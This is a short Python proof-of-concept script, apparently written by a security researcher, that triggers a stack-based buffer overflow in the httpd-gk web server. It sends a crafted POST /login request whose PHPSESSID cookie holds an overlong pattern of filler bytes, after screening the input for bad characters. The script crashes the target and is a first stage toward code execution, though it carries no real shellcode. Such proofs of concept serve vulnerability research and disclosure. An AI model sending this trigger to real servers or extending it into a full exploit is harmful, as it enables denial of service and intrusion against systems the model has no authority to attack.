#!/usr/bin/env python
# marco.lux@curesec.com
# trigger for httpd-gk vanilla stack based overflow
# June 2023

import os
import sys
import socket
import requests
import binascii
from IPython import embed

host = sys.argv[1]
port = int(sys.argv[2])

def check_badchars(payload):
    badchar = [b'\x00',b'\x20',b'\x22',b'\x3d']
    for bc in badchar:
        if payload.find(bc) !=-1:
            pos = payload.find(bc)
            print('ATTENTION! Badchar detected! {0} at pos {1}'.format(binascii.b2a_hex(bc),pos))
    return

# trigger
def setup_pkt(host,port,payload):
    req_b = b'POST /login HTTP/1.1\r\nHost: ' + host.encode() + b':' + str(port).encode() +b'\r\nCookie: PHPSESSID=' + payload + b'\r\nConnection: close\r\nContent-Length: 45\r\n\r\nlogin=login&username=root&password=nothing%3D'

    return req_b

def me_connect(host,port):
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((host,port))
    return s

# our shellcode
payload=b"A"*49 + b"R"*4 + b"B"*512

# target stuff
print(f"[+] Payload crashes webserver...")

print('[+] Checking for badchars...')
check_badchars(payload)

print(f"[+] Connecting {host}:{str(port)}")
s=me_connect(host,port)

print("[+] Setup payload...")
pp=setup_pkt(host,port,payload)

print("[+] Sending payload...")
s.send(pp)

# end
print("Done")
# check core file on target system